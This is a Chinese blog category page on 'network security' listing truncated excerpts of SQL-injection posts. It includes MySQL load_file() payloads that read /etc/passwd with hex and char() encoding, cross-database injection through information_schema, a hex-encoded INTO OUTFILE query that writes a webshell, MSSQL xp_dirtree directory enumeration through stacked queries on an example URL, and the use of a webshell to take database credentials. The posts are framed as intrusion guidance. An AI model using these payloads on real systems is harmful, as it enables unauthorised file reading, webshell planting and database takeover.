随笔分类 - 网络安全
摘要:针对MYSQL数据注入时用到的 load_file()函数对其文件查看的相关路径: 1、 replace(load_file(0x2F6574632F706173737764),0x3c,0x20)2、replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))上面两个是查看一个PHP文件里完全显示代码.有些时候不替换一些字符,如 < 替换成空格 返回的是网页.而无法查看到代码.3、 load_file(char(47)) 可以列出FreeBSD,Sunos系统根目录4、/etc/h
阅读全文
摘要:入侵假想: 目标是A站点,安全性比较可以。但是在同服务器下的B站点,我们发现了一个Mysql 注入点,并且还有查询相关库的权限。 那么,我们就可以通过B站点的注入点跨库查询A站点的信息,入侵之….. (当然你也可以把B站点入侵了,再入侵A。但不是有注入点就可以入侵的,偶?跑题了。) 大家知道在mysql5.0以后加入了 information_schemata 这个虚拟库,基本结构如下: Information_schema-------| Schemata 存放数据库信息的表 | Tables 存放数据库中表信息的表 | Columns 存放数据库中列信息的表 …………………………………..
阅读全文
摘要:PHP+MySQL JSP+MySQL 一.基础知识 1.MYSQL的版本 4.0以下,4.0以上,5.0以上。 4.0以下不支持union查询 4.0以上magic_quotes_gpc默认为on 5.0以上可以暴表暴列,支持跨库 2.magic_quotes_gpc=on 当php.ini里的 magic_quotes_gpc 为On 时。提交的变量中所有的 ' (单引号), " (双引号), \(反斜线) and 空字符会自动转为含有反斜线的转义字符。例如'会变成\'。给注入带来不少的阻碍。 3.注释符 Mysql有3种注释句法 # 注射掉注释符后面的本
阅读全文
摘要:mysql多语句执行下不用单引号outfile写shellmysql> use xssdb;Database changedmysql> set @a=0x73656C656374203078334333463730363837303230343036353736363136433238323435463530344635333534354232373633364436343237354432393342334633452066726F6D20787373206C696D6974203120696E746F206F757466696C652027433A2F7368656C6C2E
阅读全文
摘要:好,我们exec master..xp_dirtree'd:/test'假设我们在test里有两个文件夹test1和test2在test1里又有test3结果显示subdirectory depthtest1 1test3 2test2 1哈哈发现没有那个depth就是目录的级数ok了,知道怎么办了吧http://www.xxxxx.com/down/list.asp?id=1;create table dirs(paths varchar(1000),id int)-- http://www.xxxxx.com/down/list.asp?id=1;insert dirs e
阅读全文
摘要:首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和密码,你要找到用户名、密码、数据库所在的IP,然后连接上去,至于连接大家应该都会,找到网站管理员的表因为我测试的时候是用管理员的表,我朋友说任何表名都可以,只要这个表存在,代码如下:程序代码<!--#include file="xx.asp"--><%set rs=server.createobject("ADODB.recordset")id = request("id")strSQL = &quo
阅读全文